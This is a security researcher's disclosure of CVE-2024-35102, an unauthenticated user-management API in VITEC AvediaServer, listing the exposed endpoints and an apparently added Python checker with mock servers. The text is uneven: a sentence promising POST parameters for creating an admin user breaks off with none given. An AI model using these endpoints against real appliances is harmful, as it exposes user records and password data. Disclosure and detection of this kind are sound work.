AvediaServer Unauthorised API Access Vulnerability

Two weeks ago I discovered a security vulnerability in AvediaServer; the details are below. VITEC (formerly Exterity) AvediaServer uses an HTTP API to list, create and delete users, but no authentication was implemented for this API. If you send the following GET requests to an AvediaServer, without any credentials, you can see all users, the details of an individual user including the stored (encrypted) password if the user is local, and the profiles (admin, asset manager, etc.).

Platform details where I found this vulnerability:
AvediaServer
Product  : avsrv-m8105
Platform : mavsrv-c1520
Version  : 8.6.2-1


http://hostname/api/auth/users
http://hostname/api/auth/users/1
http://hostname/api/auth/profiles
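A small checker for the issue described above, added here as an example and not code from the original post or from VITEC. It sends the three GET requests with no credentials and reports an endpoint as exposed when it answers 200 with a non-empty JSON body; an answer of 401 or 403 is treated as protected. The assumptions are mine: the response format of the real device is not documented in the post, so the two embedded mock servers (one "vulnerable", one "patched" that demands an Authorization header) and their sample records are constructed for offline demonstration only.

```python
"""Probe an AvediaServer-style host for unauthenticated access to /api/auth/*.

Assumptions (not from the original post): a vulnerable server answers the GET
endpoints with HTTP 200 and a JSON body; a fixed server answers 401/403.
The mock servers below are constructed for offline demonstration only.
"""
import json
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Endpoints named in the post, relative to http://hostname/
ENDPOINTS = ("/api/auth/users", "/api/auth/users/1", "/api/auth/profiles")


def probe(base_url, path, timeout=5):
    """GET one endpoint with no credentials and classify the result."""
    req = urllib.request.Request(base_url.rstrip("/") + path, method="GET")
    req.add_header("Accept", "application/json")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            status = resp.getcode()
            body = resp.read()
    except urllib.error.HTTPError as exc:
        # 401/403/404 etc.: the server refused, so nothing was exposed.
        return {"path": path, "status": exc.code, "exposed": False}
    exposed = False
    try:
        exposed = status == 200 and bool(json.loads(body))
    except ValueError:
        pass  # 200 but not JSON (e.g. a login page): not a data leak
    return {"path": path, "status": status, "exposed": exposed}


def scan(base_url):
    """Probe every endpoint; returns one result dict per endpoint."""
    return [probe(base_url, p) for p in ENDPOINTS]


# --- constructed mock servers, for offline demonstration only ---
class VulnerableHandler(BaseHTTPRequestHandler):
    # Sample records are constructed; the field names are assumptions,
    # not the real AvediaServer schema.
    USERS = [{"id": 1, "username": "admin", "profile": "admin",
              "password": "<stored-secret>"}]

    def do_GET(self):
        if self.path == "/api/auth/users":
            payload = self.USERS
        elif self.path == "/api/auth/users/1":
            payload = self.USERS[0]
        elif self.path == "/api/auth/profiles":
            payload = [{"name": "admin"}, {"name": "asset manager"}]
        else:
            self.send_error(404)
            return
        body = json.dumps(payload).encode()
        self.send_response(200)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):
        pass  # keep the demo output quiet


class PatchedHandler(VulnerableHandler):
    """Same data, but refuses every request that carries no Authorization header."""

    def do_GET(self):
        if "Authorization" not in self.headers:
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="AvediaServer"')
            self.end_headers()
            return
        super().do_GET()


def start_mock(handler):
    """Start a mock server on a free loopback port; returns (server, base_url)."""
    srv = HTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, "http://127.0.0.1:%d" % srv.server_address[1]


if __name__ == "__main__":
    for name, handler in (("vulnerable", VulnerableHandler), ("patched", PatchedHandler)):
        srv, url = start_mock(handler)
        for result in scan(url):
            print(name, result)
        srv.shutdown()
```

To check a real appliance, call scan("http://hostname") instead of the mock URL; only run it against devices you are authorised to test.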

You can also create a user with administrative access by sending a POST request with the following parameters.
I also used Shodan and Google dorking and found several devices exposed to the internet. I identified the asset owners from the IP address records and informed them.

VITEC confirmed this vulnerability after a long wait.
MITRE has assigned CVE-2024-35102 to this vulnerability.
https://www.cve.org/CVERecord?id=CVE-2024-35102
Cumhur KIZILARI (aka Zeus)
